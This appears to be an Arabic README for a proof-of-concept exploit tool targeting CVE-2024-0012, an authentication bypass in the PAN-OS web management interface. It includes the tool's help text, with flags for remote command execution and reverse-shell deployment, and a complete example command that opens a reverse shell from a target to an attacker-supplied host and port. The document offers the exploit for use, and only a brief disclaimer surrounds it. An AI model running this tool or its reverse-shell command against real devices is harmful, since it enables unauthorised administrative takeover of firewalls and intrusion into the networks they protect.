
CVE-2024-0012 PAN-OS: تجاوز المصادقة في واجهة الويب للإدارة (PAN-SA-2024-0015) RCE POC
CVE-2024-0012 هو ثغرة في تجاوز المصادقة في برنامج PAN-OS من Palo Alto Networks، تتيح لمهاجم غير مصدَّق لديه وصول شبكي إلى واجهة الإدارة على الويب الحصول على صلاحيات مسؤول PAN-OS لتنفيذ إجراءات إدارية، أو العبث بالتكوين، أو استغلال ثغرات أخرى لتصعيد الصلاحيات بعد المصادقة.

| ❗ إخلاء مسؤولية |
|---|
| هذا المشروع مبني أساساً لاستخدامه كأداة CLI مستقلة. تشغيل هذا الاستغلال كخدمة قد يشكل مخاطر أمنية. يُوصى باستخدامه بحذر مع اتخاذ إجراءات أمنية إضافية. اعمل بحسابك الخاص. |
python3 cve-2024-0012.py -h
سيظهر هذا المساعدة الخاصة بالأداة. فيما يلي جميع المفاتيح التي تدعمها.
Usage:
python3 cve-2024-0012.py [flags]
Flags:
-h, --help show this help message and exit
--url URL Target base URL (http:// or https://)
--no-verify Disable SSL verification
--timeout TIMEOUT Request timeout in seconds
--command COMMAND Command to execute on the target
--reverse-shell Deploy a reverse shell to the target
--lhost LHOST Local host for reverse shell connection (required for reverse shell)
--lport LPORT Local port for reverse shell connection (required for reverse shell)
أمر الصدفة العكسية.
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444